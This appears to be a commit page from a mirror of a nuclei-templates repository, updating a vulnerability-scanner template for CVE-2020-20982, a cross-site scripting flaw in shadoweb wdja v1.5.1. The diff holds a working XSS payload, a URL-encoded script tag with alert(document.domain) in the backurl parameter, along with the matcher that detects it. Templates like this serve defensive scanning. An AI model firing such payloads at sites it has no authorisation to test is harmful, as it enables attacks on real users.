daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2020-20982.yaml

patch-1
Ritik Chaddha 2022-06-25 14:34:40 +05:30 committed by GitHub
parent 6506226d47
commit c62e3e72b6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
cves/2020/CVE-2020-20982.yaml
View File

@ -2,12 +2,14 @@ id: CVE-2020-20982
info: info:
name: shadoweb wdja v1.5.1 - Cross-Site Scripting name: shadoweb wdja v1.5.1 - Cross-Site Scripting
author: pikpikcu author: pikpikcu,ritikchaddha
severity: critical severity: critical
description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.
reference: reference:
- https://github.com/shadoweb/wdja/issues/1 - https://github.com/shadoweb/wdja/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-20982 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982
metadata:
verified: true
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.6 cvss-score: 9.6
@ -18,7 +20,6 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
stop-at-first-match: true stop-at-first-match: true
@ -27,7 +28,7 @@ requests:
- type: word - type: word
condition: and condition: and
words: words:
- '</script><script>alert(document.domain)</script>' - "location.href='</script><script>alert(document.domain)</script>"
- type: word - type: word
part: header part: header